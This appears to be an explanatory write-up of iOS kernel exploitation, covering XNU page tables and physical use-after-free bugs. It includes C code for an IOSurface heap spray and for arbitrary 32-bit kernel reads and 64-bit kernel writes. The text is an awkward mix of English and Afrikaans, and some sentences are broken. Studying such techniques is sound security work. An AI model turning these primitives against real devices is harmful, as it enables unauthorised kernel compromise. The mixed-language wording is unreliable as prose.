iOS Exploiting

Fisiese gebruik-na-vry

This is a summary from the post from https://alfiecg.uk/2024/09/24/Kernel-exploit.html moreover further information about exploit using this technique can be found in https://github.com/felix-pb/kfd

Geheuebestuur in XNU

The virtuele geheue-adresruimte for user processes on iOS spans from 0x0 to 0x8000000000. However, these addresses don’t directly map to physical memory. Instead, the kernel uses bladsy tabelle to translate virtual addresses into actual fisiese adresse.

Vlakke van Bladsy Tabels in iOS

Bladsy tabelle is hiërargies georganiseer in drie vlakke:

  1. L1 Bladsy Tabel (Vlak 1):

  • Each entry here represents a large range of virtual memory.

  • It covers 0x1000000000 bytes (or 256 GB) of virtual memory.

  1. L2 Bladsy Tabel (Vlak 2):

  • An entry here represents a smaller region of virtual memory, specifically 0x2000000 bytes (32 MB).

  • An L1 entry may point to an L2 table if it can't map the entire region itself.

  1. L3 Bladsy Tabel (Vlak 3):

  • This is the finest level, where each entry maps a single 4 KB memory page.

  • An L2 entry may point to an L3 table if more granular control is needed.

Kaarting Virtuele na Fisiese Geheue

  • Direkte Kaarting (Blok Kaarting):

  • Some entries in a page table directly map a range of virtual addresses to a contiguous range of physical addresses (like a shortcut).

  • Wysiger na Kind Bladsy Tabel:

  • If finer control is needed, an entry in one level (e.g., L1) can point to a kind bladsy tabel at the next level (e.g., L2).

Voorbeeld: Kaarting 'n Virtuele Adres

Let’s say you try to access the virtual address 0x1000000000:

  1. L1 Tabel:

  • The kernel checks the L1 page table entry corresponding to this virtual address. If it has a pointer to an L2 page table, it goes to that L2 table.

  1. L2 Tabel:

  • The kernel checks the L2 page table for a more detailed mapping. If this entry points to an L3 page table, it proceeds there.

  1. L3 Tabel:

  • The kernel looks up the final L3 entry, which points to the fisiese adres of the actual memory page.

Voorbeeld van Adres Kaarting

If you write the physical address 0x800004000 into the first index of the L2 table, then:

  • Virtual addresses from 0x1000000000 to 0x1002000000 map to physical addresses from 0x800004000 to 0x802004000.

  • This is a blok kaarting at the L2 level.

Alternatively, if the L2 entry points to an L3 table:

  • Each 4 KB page in the virtual address range 0x1000000000 -> 0x1002000000 would be mapped by individual entries in the L3 table.

Fisiese gebruik-na-vry

A fisiese gebruik-na-vry (UAF) occurs when:

  1. A process alloceer some memory as leesbaar en skryfbaar.

  2. The bladsy tabelle are updated to map this memory to a specific physical address that the process can access.

  3. The process dealloceer (vry) the memory.

  4. However, due to a fout, the kernel vergeet om die kaarting from the page tables, even though it marks the corresponding physical memory as free.

  5. The kernel can then heralloceer this "vrygestel" fisiese geheue for other purposes, like kernel data.

  6. Since the mapping wasn’t removed, the process can still lees en skryf to this physical memory.

This means the process can access bladsye van kernel geheue, which could contain sensitive data or structures, potentially allowing an attacker to manipuleer kernel geheue.

Eksploitasiestategie: Heap Spray

Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called heap spray:

  1. The attacker skep 'n groot aantal IOSurface-objekte in kernel geheue.

  2. Each IOSurface object contains a magiese waarde in one of its fields, making it easy to identify.

  3. They skandeer die vrygestelde bladsye to see if any of these IOSurface objects landed on a freed page.

  4. When they find an IOSurface object on a freed page, they can use it to lees en skryf kernel geheue.

More info about this in https://github.com/felix-pb/kfd/tree/main/writeups

Stap-vir-Stap Heap Spray Proses

  1. Spray IOSurface-objekte: The attacker creates many IOSurface objects with a special identifier ("magiese waarde").

  2. Skandeer Vrygestelde Bladsye: They check if any of the objects have been allocated on a freed page.

  3. Lees/Skryf Kernel Geheue: By manipulating fields in the IOSurface object, they gain the ability to perform arbitraire lees en skrywe in kernel geheue. This lets them:

  • Use one field to lees enige 32-bit waarde in kernel geheue.

  • Use another field to skryf 64-bit waardes, achieving a stable kernel lees/skryf primitief.

Generate IOSurface objects with the magic value IOSURFACE_MAGIC to later search for:

void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;

size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;

IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;

(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}

Soek na IOSurface-objekte in een vrygemaakte fisiese bladsy:

int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;

for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);

for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);

for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}

sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);

return 0;
}

Bereik Kernel Lees/Skryf met IOSurface

Na die verkryging van beheer oor 'n IOSurface objek in kernel geheue (gemap na 'n vrygestelde fisiese bladsy wat vanaf gebruikersruimte toeganklik is), kan ons dit gebruik vir arbitraire kernel lees en skryf operasies.

Belangrike Velde in IOSurface

Die IOSurface objek het twee belangrike velde:

  1. Gebruik Tel Punter: Laat 'n 32-bis lees toe.

  2. Geverifieerde Tydstempel Punter: Laat 'n 64-bis skryf toe.

Deur hierdie punters te oorskryf, herlei ons hulle na arbitraire adresse in kernel geheue, wat lees/skryf vermoëns moontlik maak.

32-Bit Kernel Lees

Om 'n lees uit te voer:

  1. Oorskryf die gebruik tel punter om na die teikenadres minus 'n 0x14-byt offset te wys.

  2. Gebruik die get_use_count metode om die waarde by daardie adres te lees.

uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}

uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}

64-Bit Kernel Skryf

Om 'n skryf te doen:

  1. Oorskryf die geïndekseerde tydstempel-aanwyser na die teikenadres.

  2. Gebruik die set_indexed_timestamp metode om 'n 64-bit waarde te skryf.

void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}

void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}

Exploit Flow Recap

  1. Trigger Physical Use-After-Free: Vrye bladsye is beskikbaar vir hergebruik.

  2. Spray IOSurface Objects: Allokeer baie IOSurface-objekte met 'n unieke "magic value" in die kerngeheue.

  3. Identify Accessible IOSurface: Vind 'n IOSurface op 'n vrygemaakte bladsy wat jy beheer.

  4. Abuse Use-After-Free: Wysig wysers in die IOSurface-objek om arbitrêre kernel read/write via IOSurface-metodes moontlik te maak.

With these primitives, the exploit provides controlled 32-bit reads and 64-bit writes to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).

Last updated